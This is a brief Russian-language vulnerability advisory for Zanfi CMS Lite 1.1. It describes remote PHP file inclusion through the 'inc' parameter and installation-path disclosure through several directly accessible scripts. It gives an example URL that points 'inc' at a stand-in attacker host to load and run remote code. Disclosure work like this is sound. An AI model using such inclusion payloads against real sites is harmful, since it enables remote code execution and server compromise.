Программа: Zanfi CMS Lite 1.1
Обнаружено несколько уязвимостей в Zanfi CMS Lite. Удаленный атакующий может выполнить произвольный php сценарий и системные команды на уязвимой системе и получить данные об установочной директории сервера.
Удаленный атакующий может указать в качестве параметра переменной ‘inc’ путь к удаленному php сценарию, который будет выполнен на уязвимой системе.
Пример:
http://[target]/index.php?inc=http://[attacker]
Удаленный атакующий может напрямую обратиться к нескольким сценариям и поучить данные об установочной директории.
Пример:
http://[target]/cms/adm_pages.php
Уязвимые сценарии: 'corr_pages.php', 'del_block.php', 'del_page.php', 'footer.php', и 'home.php'.
